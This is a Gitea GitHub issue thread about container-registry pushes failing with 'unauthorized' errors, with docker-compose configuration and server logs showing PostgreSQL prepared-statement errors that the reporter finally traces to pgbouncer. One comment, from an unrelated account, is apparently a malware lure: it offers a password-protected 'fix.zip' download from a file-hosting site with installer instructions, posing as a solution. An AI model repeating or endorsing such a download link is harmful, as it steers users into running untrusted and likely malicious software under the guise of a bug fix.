### ISSUE TITLE
An authentication error occurs when pushing an image to the `container registry`.

### ISSUE THREAD

**Issue by phi-friday** [go-gitea/gitea#31932]
### Description

I logged into the `container registry` successfully.
And pushed the image.
Some layers are pushed and I get an authentication error.
I checked the `gitea` web UI and saw that the package has not been uploaded.
But it was entered in `package` in `db`.

```shell
Last login: Tue Aug 27 14:08:47 on ttys074
❯ docker login <custom domain>:<custom port>
Authenticating with existing credentials...
Stored credentials invalid or expired
Username (***): ***
Password:
Login Succeeded
❯ docker tag <custom image>:latest <custom domain>:<custom port>/***/docker_image_test:latest
❯ docker push <custom domain>:<custom port>/***/docker_image_test:latest
The push refers to repository [<custom domain>:<custom port>/***/docker_image_test]
b3305702c05b: Pushed
5f70bf18a086: Pushed
24a6b2790c33: Pushed
3e67cd6b6345: Preparing
9a1ea02ff49c: Pushed
5a9bef041d8a: Pushed
883d4812884a: Pushed
76c46cdfc5bc: Pushed
7bb1110f7687: Pushed
410feee14859: Pushed
0576082a51ac: Pushed
91bbafc72e16: Pushed
07d2ee3f5712: Pushed
unauthorized: authentication required
```

### Gitea Version

1.22.1

### Can you reproduce the bug on the Gitea demo site?

Yes

## permission
![스크린샷 2024-08-28 오후 1 42 11](https://github.com/user-attachments/assets/e1f912b8-5a8d-4801-8b1f-e199fddbe327)

## db
![스크린샷 2024-08-28 오후 1 41 27](https://github.com/user-attachments/assets/8deb8d51-d3f5-403c-a1e5-fa01e2521047)

### How are you running Gitea?

```yaml
services:
  repository:
    container_name: git-server
    image: gitea/gitea:1.22.1
    restart: always
    env_file:
      - .env
    ports:
      - "127.0.0.1:${GITEA_SSH_PORT}:22"
    networks:
      - public-network
    command:
      - sh
      - -c
      - |
        sh /init.sh
        /bin/s6-svscan /etc/s6
    environment:
      - TZ=Asia/Seoul
    volumes:
      - git-server:/data
      - type: bind
        source: "/home/${GITEA_SSH_USER_NAME}/.ssh"
        target: "/data/git/.ssh"
        read_only: false
      - type: bind
        source: "./app.ini.default"
        target: "${GITEA_APP_DEFAULT_PATH}"
        read_only: true
      - type: bind
        source: "./init.sh"
        target: "/init.sh"
        read_only: true
      - "/etc/timezone:/etc/timezone:ro"
      - "/etc/localtime:/etc/localtime:ro"
    extra_hosts:
      - ${COMMON_PROXY_LOCAL_HOST}:host-gateway
      - ${COMMON_ADDITIONAL_PROXY_LOCAL_HOST}:host-gateway
    logging:
      options:
        max-size: 10m
        max-file: 1
```

### Database

PostgreSQL

**Comment by cnhbliyou** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by phi-friday** [comment]
```log
2024/08/29 17:04:09 ...eb/routing/logger.go:102:func1() [I] router: completed GET /v2/ for 192.168.176.4:39990, 401 Unauthorized in 0.1ms @ container/container.go:126(container.ReqContainerAccess)
2024/08/29 17:04:09 ...eb/routing/logger.go:102:func1() [I] router: completed GET /v2/token?account=***&client_id=docker&offline_token=true&service=container_registry for 192.168.176.4:39998, 200 OK in 8.1ms @ container/container.go:149(container.Authenticate)
2024/08/29 17:04:09 ...eb/routing/logger.go:102:func1() [I] router: completed GET /v2/ for 192.168.176.4:40010, 200 OK in 0.7ms @ container/container.go:141(container.DetermineSupport)
```

If I log in with `docker login`,I will be logged in normally. 
However, the logs show that there was a 401 error. Is this normal behavior?

**Comment by phi-friday** [comment]
full logs when exec `docker push ...`
```log
2024/08/29 17:09:19 ...eb/routing/logger.go:102:func1() [I] router: completed GET /v2/ for 192.168.176.4:41326, 401 Unauthorized in 0.1ms @ container/container.go:126(container.ReqContainerAccess)
2024/08/29 17:09:19 ...eb/routing/logger.go:102:func1() [I] router: completed GET /v2/token?account=***&scope=repository%3A***%2F<some image>%3Apush%2Cpull&service=container_registry for 192.168.176.4:41328, 200 OK in 9.3ms @ container/container.go:149(container.Authenticate)
2024/08/29 17:09:19 ...es/container/auth.go:38:Verify() [E] GetPossibleUserByID:  pq: unnamed prepared statement does not exist
2024/08/29 17:09:19 .../api/packages/api.go:87:func1() [E] Failed to verify user: pq: unnamed prepared statement does not exist
2024/08/29 17:09:19 ...eb/routing/logger.go:102:func1() [I] router: completed HEAD /v2/***/<some image>/blobs/sha256:83d0a109e8c8f80b33f4f4644f11865ef3016f67db4de0f0c635343b4c35df23 for 192.168.176.4:41340, 401 Unauthorized in 0.9ms @ packages/api.go:83(packages.verifyAuth)
2024/08/29 17:09:19 ...ntainer/container.go:90:apiError() [E] pq: bind message supplies 1 parameters, but prepared statement "" requires 6
2024/08/29 17:09:19 ...eb/routing/logger.go:102:func1() [I] router: completed HEAD /v2/***/<some image>/blobs/sha256:e090a37448a14148c68fee70e80e5111321056031672f61fda73b57b5089168f for 192.168.176.4:41350, 500 Internal Server Error in 3.6ms @ container/container.go:486(container.HeadBlob)
2024/08/29 17:09:19 ...ntainer/container.go:90:apiError() [E] pq: bind message supplies 6 parameters, but prepared statement "" requires 1
2024/08/29 17:09:19 ...eb/routing/logger.go:102:func1() [I] router: completed HEAD /v2/***/<some image>/blobs/sha256:9cbf7361fb9754bbe9551228b2cff55379f47817f2ec7cbb42dfab480bcb6c22 for 192.168.176.4:41356, 500 Internal Server Error in 1.8ms @ container/container.go:486(container.HeadBlob)
2024/08/29 17:09:19 ...es/container/auth.go:38:Verify() [E] GetPossibleUserByID:  pq: unnamed prepared statement does not exist
2024/08/29 17:09:19 .../api/packages/api.go:87:func1() [E] Failed to verify user: pq: unnamed prepared statement does not exist
2024/08/29 17:09:19 ...eb/routing/logger.go:102:func1() [I] router: completed POST /v2/***/<some image>/blobs/uploads/ for 192.168.176.4:41372, 401 Unauthorized in 2.9ms @ packages/api.go:83(packages.verifyAuth)
2024/08/29 17:09:19 ...es/container/auth.go:38:Verify() [E] GetPossibleUserByID:  pq: bind message has 46 result formats but query has 1 columns
2024/08/29 17:09:19 .../api/packages/api.go:87:func1() [E] Failed to verify user: pq: bind message has 46 result formats but query has 1 columns
2024/08/29 17:09:19 ...eb/routing/logger.go:102:func1() [I] router: completed POST /v2/***/<some image>/blobs/uploads/ for 192.168.176.4:41360, 401 Unauthorized in 4.7ms @ packages/api.go:83(packages.verifyAuth)
2024/08/29 17:09:19 ...es/container/auth.go:38:Verify() [E] GetPossibleUserByID:  pq: bind message supplies 1 parameters, but prepared statement "" requires 6
2024/08/29 17:09:19 .../api/packages/api.go:87:func1() [E] Failed to verify user: pq: bind message supplies 1 parameters, but prepared statement "" requires 6
2024/08/29 17:09:19 ...eb/routing/logger.go:102:func1() [I] router: completed POST /v2/***/<some image>/blobs/uploads/ for 192.168.176.4:41378, 401 Unauthorized in 0.9ms @ packages/api.go:83(packages.verifyAuth)
2024/08/29 17:09:19 ...eb/routing/logger.go:102:func1() [I] router: completed POST /v2/***/<some image>/blobs/uploads/ for 192.168.176.4:41374, 202 Accepted in 3.2ms @ container/container.go:218(container.InitiateUploadBlob)
2024/08/29 17:09:19 ...ntainer/container.go:90:apiError() [E] pq: bind message supplies 2 parameters, but prepared statement "" requires 1
2024/08/29 17:09:19 ...eb/routing/logger.go:102:func1() [I] router: completed HEAD /v2/***/<some image>/blobs/sha256:4f4fb700ef54461cfa02571ae0db9a0dc1e0cdb5577484a6d75e68dc38e8acc1 for 192.168.176.4:41364, 500 Internal Server Error in 11.3ms @ container/container.go:486(container.HeadBlob)
2024/08/29 17:09:19 ...ntainer/container.go:90:apiError() [E] pq: bind message supplies 6 parameters, but prepared statement "" requires 1
2024/08/29 17:09:19 ...eb/routing/logger.go:102:func1() [I] router: completed HEAD /v2/***/<some image>/blobs/sha256:c74dbeb2bd522208cc0b151d1b35d856fd6860bced5212340ca9c1e53b9671e2 for 192.168.176.4:41380, 500 Internal Server Error in 4.2ms @ container/container.go:486(container.HeadBlob)
2024/08/29 17:09:19 ...ntainer/container.go:90:apiError() [E] pq: bind message has 7 result formats but query has 46 columns
2024/08/29 17:09:19 ...eb/routing/logger.go:102:func1() [I] router: completed HEAD /v2/***/<some image>/blobs/sha256:8b5994e7e3f5b2ecab084ab0a17c8ba91dd650b3fd2310c0db0942089e20d777 for 192.168.176.4:41382, 500 Internal Server Error in 7.0ms @ container/container.go:486(container.HeadBlob)
2024/08/29 17:09:19 ...es/container/auth.go:38:Verify() [E] GetPossibleUserByID:  pq: bind message supplies 1 parameters, but prepared statement "" requires 6
2024/08/29 17:09:19 .../api/packages/api.go:87:func1() [E] Failed to verify user: pq: bind message supplies 1 parameters, but prepared statement "" requires 6
2024/08/29 17:09:19 ...eb/routing/logger.go:102:func1() [I] router: completed HEAD /v2/***/<some image>/blobs/sha256:5b0c237f128d53f9e2626952ca3ad8c41353d89e6be127eb457e544bfa5e9923 for 192.168.176.4:41398, 401 Unauthorized in 1.3ms @ packages/api.go:83(packages.verifyAuth)
2024/08/29 17:09:19 ...ntainer/container.go:90:apiError() [E] pq: bind message supplies 2 parameters, but prepared statement "" requires 1
2024/08/29 17:09:19 ...eb/routing/logger.go:102:func1() [I] router: completed HEAD /v2/***/<some image>/blobs/sha256:65eb5b42ac8cf50e7cabf688b8fcceb74fdd3c5e9f6a9be861c4c4aa4c8e4a7d for 192.168.176.4:41390, 500 Internal Server Error in 8.8ms @ container/container.go:486(container.HeadBlob)
2024/08/29 17:09:19 ...ntainer/container.go:90:apiError() [E] pq: bind message supplies 5 parameters, but prepared statement "" requires 1
2024/08/29 17:09:19 ...eb/routing/logger.go:102:func1() [I] router: completed POST /v2/***/<some image>/blobs/uploads/ for 192.168.176.4:41436, 500 Internal Server Error in 2.7ms @ container/container.go:218(container.InitiateUploadBlob)
2024/08/29 17:09:19 ...eb/routing/logger.go:102:func1() [I] router: completed POST /v2/***/<some image>/blobs/uploads/ for 192.168.176.4:41410, 202 Accepted in 5.0ms @ container/container.go:218(container.InitiateUploadBlob)
2024/08/29 17:09:19 ...es/container/auth.go:38:Verify() [E] GetPossibleUserByID:  pq: bind message supplies 1 parameters, but prepared statement "" requires 5
2024/08/29 17:09:19 .../api/packages/api.go:87:func1() [E] Failed to verify user: pq: bind message supplies 1 parameters, but prepared statement "" requires 5
2024/08/29 17:09:19 ...eb/routing/logger.go:102:func1() [I] router: completed POST /v2/***/<some image>/blobs/uploads/ for 192.168.176.4:41426, 401 Unauthorized in 5.7ms @ packages/api.go:83(packages.verifyAuth)
2024/08/29 17:09:19 ...eb/routing/logger.go:102:func1() [I] router: completed POST /v2/***/<some image>/blobs/uploads/ for 192.168.176.4:41422, 202 Accepted in 6.9ms @ container/container.go:218(container.InitiateUploadBlob)
2024/08/29 17:09:19 ...ntainer/container.go:90:apiError() [E] pq: bind message supplies 6 parameters, but prepared statement "" requires 5
2024/08/29 17:09:19 ...eb/routing/logger.go:102:func1() [I] router: completed HEAD /v2/***/<some image>/blobs/sha256:9a8d53d436886679235ad14b4074daa8b5052ee5309210720126c5e36cd127c3 for 192.168.176.4:41446, 500 Internal Server Error in 2.5ms @ container/container.go:486(container.HeadBlob)
2024/08/29 17:09:19 ...ntainer/container.go:90:apiError() [E] pq: bind message supplies 5 parameters, but prepared statement "" requires 6
2024/08/29 17:09:19 ...eb/routing/logger.go:102:func1() [I] router: completed POST /v2/***/<some image>/blobs/uploads/ for 192.168.176.4:41442, 500 Internal Server Error in 6.3ms @ container/container.go:218(container.InitiateUploadBlob)
2024/08/29 17:09:19 ...ntainer/container.go:90:apiError() [E] pq: bind message supplies 2 parameters, but prepared statement "" requires 1
2024/08/29 17:09:19 ...eb/routing/logger.go:102:func1() [I] router: completed HEAD /v2/***/<some image>/blobs/sha256:d49e5419df51905cf4e92096662ac9a89306544243b2d9ab5500d18ee201822c for 192.168.176.4:41458, 500 Internal Server Error in 4.4ms @ container/container.go:486(container.HeadBlob)
2024/08/29 17:09:19 ...ntainer/container.go:90:apiError() [E] pq: bind message supplies 2 parameters, but prepared statement "" requires 1
2024/08/29 17:09:19 ...eb/routing/logger.go:102:func1() [I] router: completed HEAD /v2/***/<some image>/blobs/sha256:e2918db29851c8501316aac8901e6533aeb741be127f71674998fda671ea4013 for 192.168.176.4:41472, 500 Internal Server Error in 4.0ms @ container/container.go:486(container.HeadBlob)
2024/08/29 17:09:19 ...es/container/auth.go:38:Verify() [E] GetPossibleUserByID:  pq: invalid input syntax for type bigint: "git"
2024/08/29 17:09:19 .../api/packages/api.go:87:func1() [E] Failed to verify user: pq: invalid input syntax for type bigint: "git"
2024/08/29 17:09:19 ...eb/routing/logger.go:102:func1() [I] router: completed HEAD /v2/***/<some image>/blobs/sha256:efc2b5ad9eec05befa54239d53feeae3569ccbef689aa5e5dbfc25da6c4df559 for 192.168.176.4:41494, 401 Unauthorized in 2.8ms @ packages/api.go:83(packages.verifyAuth)
2024/08/29 17:09:19 ...es/container/auth.go:38:Verify() [E] GetPossibleUserByID:  pq: bind message has 46 result formats but query has 7 columns
2024/08/29 17:09:19 .../api/packages/api.go:87:func1() [E] Failed to verify user: pq: bind message has 46 result formats but query has 7 columns
2024/08/29 17:09:19 ...eb/routing/logger.go:102:func1() [I] router: completed POST /v2/***/<some image>/blobs/uploads/ for 192.168.176.4:41484, 401 Unauthorized in 3.7ms @ packages/api.go:83(packages.verifyAuth)
2024/08/29 17:09:19 ...eb/routing/logger.go:102:func1() [I] router: completed POST /v2/***/<some image>/blobs/uploads/ for 192.168.176.4:41504, 202 Accepted in 3.1ms @ container/container.go:218(container.InitiateUploadBlob)
2024/08/29 17:09:19 ...eb/routing/logger.go:102:func1() [I] router: completed POST /v2/***/<some image>/blobs/uploads/ for 192.168.176.4:41510, 202 Accepted in 3.1ms @ container/container.go:218(container.InitiateUploadBlob)
2024/08/29 17:09:19 ...eb/routing/logger.go:102:func1() [I] router: completed POST /v2/***/<some image>/blobs/uploads/ for 192.168.176.4:41522, 202 Accepted in 5.2ms @ container/container.go:218(container.InitiateUploadBlob)
```

**Comment by phi-friday** [comment]
The problem was caused by `pgbouncer` or `prepared statements`. 
This was resolved by referencing #28083.
